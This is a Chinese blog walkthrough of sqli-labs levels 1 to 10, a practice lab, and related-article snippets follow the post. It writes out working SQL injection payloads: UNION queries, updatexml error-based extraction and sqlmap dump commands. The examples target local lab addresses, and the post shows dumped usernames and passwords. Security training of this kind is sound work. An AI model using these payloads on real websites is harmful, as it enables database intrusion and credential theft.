sqllabs 1到10关解法

已于 2023-09-11 16:03:45 修改
阅读量80 收藏
点赞数 1
分类专栏: 安全学习 文章标签: web安全
于 2023-09-04 19:15:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/j2941174356/article/details/132675632
版权
  • 1-4 关为联合查询
    1. 又回显 使用联合查询  其中的数据库 information 是MySQL自带的数据库信息可以知道所有库,表,列信息
    2. 使用 \ 判断出 闭合符合
      1. http://127.0.0.1/sqllabs/Less-4/?id=1 \
        1. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1 \") LIMIT 0,1' at line 1 (比如这个闭合符号就是
    1. 判断 数据库的列数
      1. http://127.0.0.1/sqllabs/Less-4/?id=1 ") order by 4 --+
        1. Unknown column '4' in 'order clause'
      1. http://127.0.0.1/sqllabs/Less-4/?id=1 ") order by 3 --+
        1. Your Login name:Dumb  Your Password:Dumb
    1. 联合查询判断回显位置
      1. http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,2,3 --+
        1. Your Login name:2 Your Password:3
      2. http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,database(),version() --+
        1. Your Login name:security  Your Password:5.7.26
    1. 查询数据库
      1. http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(schema_name) from information_schema.schemata),version() --+
        1. name:information_schema,challenges,dvwa,mysql,performance_schema,security,sys,yuji   Your Password:5.7.26
    2. 查询表
      1. http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),version() --+
        1. 此方法 省去查询数据库 但是 前提为 dataabse() 未被禁用
      2. http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),version() --+
        1. Your Login name:emails,referers,uagents,users   Your Password:5.7.26
    3. 查询列
      1. http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),version() --+
        1. Your Login name:id,username,password   Your Password:5.7.26
    4. 查询数据
      1. http://127.0.0.1/sqllabs/Less-4/?id=-1 ") union select 1,(select group_concat(username,0x7e,password) from security.users),version() --+
        1. Your Login name:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,secure~crappy,stupid~stupidity,superman~genious,batman~mob!le,admin~admin,admin~admin1,admin2~admin2,admin3~admin3,dhakkan~dumbo,admin4~admin4
  • 5-6关为报错注入
    1. 有报错回显 ,使用报错注入
    2. 找到注入点 使用 \ 转义也可以
    3. 使用报错函数 updatexml  (报错注入点在第二个位置)
      1. http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select user()),1) --+
        1. XPATH syntax error: '@localhost'
    1. 报错 显示 表
      1. http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'
        1. XPATH syntax error: ',referers,uagents,users'
    1. 报错 显示 列
      1. http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema ='security' and table_name='users'  ),1) --+
        1. XPATH syntax error: ',username,password
    2. 报错 显示 数据
      1. http://127.0.0.1/sqllabs/Less-6/?id=1 " and updatexml(1,(select group_concat(username,0x7e,password) from security.users ),1) --+
        1. 显示不全 因为 updataxml只显示 3位字节
        2. XPATH syntax error: '~Dumb0x7eDumb,Angelina0x7eI-kill'
      2. http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat(0x7e,mid((select group_concat(username,'0x7e',password) from security.users),1,31)),1) --+
      3. http://127.0.0.1/sqllabs/Less-6/?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,'0x7e',password) from security.users),1,31)),1) --+
        1. 分段显示数据所在位置
  • 7-10 使用 sql注入工具 sqlmap
    1. 也可以使用盲注来实现
    2.  爆破数据库名称
      1. sqlmap -u "http://192.168.124.78/sqllabs/Less-8/?id=1" -dbs --batch
    1. 爆破数据表
      1. sqlmap -u "http://192.168.124.78/sqllabs/Less-8/?id=1" -D 'security' -tables  --batch
    2. 爆破列
      1. sqlmap -u "http://192.168.124.78/sqllabs/Less-8/?id=1" -D 'security' -T 'users' -columns  --batch
    3. 爆破数据
      1. sqlmap -u "http://192.168.124.78/sqllabs/Less-8/?id=1" -D 'security' -T 'users' -C'username,password'  --batch --dump
  • 使用sqlmap 注入sqllabs时候 需要使用本机 IP地址来实现注入 (sqlmap爆破SQL labs出现的问题)
    1.  testing connection to the target URL
    2. [CRITICAL] unable to connect to the target URL ('Connection refused'). sqlmap is going to retry the request(s)
    3. [ERROR] there was an error checking the stability of page because of lack of content. Please check the page request results (and probable errors) by using higher verbosity levels
  • 记得点赞关注哦 有问题 发布评论区一起探讨吧 w_w
雨季小朋友
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sql-labs 1-10 含多种解法 包括sqlmap py脚本
07-23
全部免费 仅供学习使用
SQL查询连续号码段的巧妙解法
09-11
SQL查询连续号码段的巧妙解法
sqllabs 10到20解法
j2941174356的博客
09-05 121
sqllabs 11-20解法 burpsuite 对 sqllabs 抓包 出现的问题以及解决办法
sqli-labs靶场1-10
Cobra的博客
04-05 345
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 一、手工UNION联合查询注入 1、输入?id=1’发现报错,输入?id=1’-- -(-- -为注释符),页面回显正常,说明是单引号闭合注入。 2、爆数据库名 ?id=-1' union select 1,2,database() -- - (得到“security”数据库) 3、爆表名 ?id=-1' union select 1...
sqlilabs第46两种解法
m0_62738649的博客
02-21 244
第二种方法时间盲注法,我们可以将要查询的字母数字查询出来(可以用substr()函数截取)并比较界面的反应时间来判断是否猜中。延迟的时间并不是sleep(1)中的1秒,而是大于1秒。它与所查询的数据的条数是成倍数系的。可以知道它是按照我们输入的sort值来排序的。在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。计算公式:延迟时间=sleep(1)的秒数*所查询数据条数。如果查询的数据很多时,延迟的时间就会特别长。时,这时候发现屏幕上的显示的不是再是。注入就是通过可控制的位置在。
sqli-labs 第五
m0_63711447的博客
04-01 4450
第五可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
sqli-labs(1-10)
errorr0
05-06 349
sql-labs
sqli-labs第21-28
永远相信美好的事情即将发生
02-11 1069
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到报错了,报错信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
SQL-Labs靶场“36-37”教程
钟言的博客
03-19 3204
本篇为SQL-Labs靶场的36到37的通教程,详细内容包含了:一、36 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-Labs靶场“34-35”教程
钟言的博客
03-18 2333
本篇为SQL-Labs靶场的34到35教程,详细内容包含了:34 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
0-1背包问题多种解法
06-06
0-1背包问题的多种解法,包括暴力求解、动态规划求解、回溯法、贪心法求解求解、模拟退火算法,C++源代码,有详细的注释
0-1背包问题的Python实现-解法.zip
03-21
背包问题 0-1背包问题的Python实现_解法
sql-lab
godfather914的博客
07-01 244
sql-lab
Gartner发布电信运营商应对持续变化的网络安全环境指南:现代云安全与网络安全的五大核心挑战
最新发布
lurenjia404的博客
05-30 516
所有组织的云和网络都面临着高级威胁。作为网络安全键参与者,电信运营商的 CIO 需要了解行业面临的挑战,并了解应采用哪些解决方案来实现方法的现代化。
如何处理网安发出的网络安全监督检查限期整改通知
联蔚盘云的博客
05-27 396
近期,很多客户都收到了网安发出的限期整改通知。大家都比较心的问题是,如何应对处理这些限期整改通知。后续是否有其他的影响,需要如何做进一步的优化整改和调整。今天就这些问题给大家做一些分享。
构建坚不可摧的Web安全防线:深入剖析二阶注入与全面防御策略
weixin_43822401的博客
05-27 823
SQL注入攻击通过在用户输入中嵌入恶意SQL代码,企图让数据库执行这些非法命令,从而达到窃取、破坏或篡改数据的目的。
HFish蜜罐实践:网络安全防御的主动出击
weixin_43822401的博客
05-29 651
HFish蜜罐作为一种主动防御工具,通过模拟易受攻击的服务,吸引攻击者,不仅能有效捕获攻击行为,还能为安全分析和溯源提供宝贵信息。HFish蜜罐作为一种先进的网络安全防御工具,不仅能够有效地捕获和分析攻击行为,还能为安全专家提供攻击溯源的重要线索。为每个节点配置蜜罐服务,如FTP、SSH、Telnet等,这些服务作为诱饵,用于吸引并捕获攻击者的行为。收集所有连接和攻击节点的IP信息,通过分析这些信息,刻画攻击者画像,构建私有情报库。利用攻击者使用的工具漏洞,进行信息提取和溯源,确定攻击者的身份和来源。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1064
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
sqli-labs第五解法
10-14
sqli-labs第五是一个基于时间的盲注漏洞,需要使用时间延迟来判断SQL语句的执行结果。以下是解题步骤: 1. 在输入框中输入 `' and if(substr(database(),1,1)='s',sleep(5),1)#`,其中 `substr(database(),1,1)` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值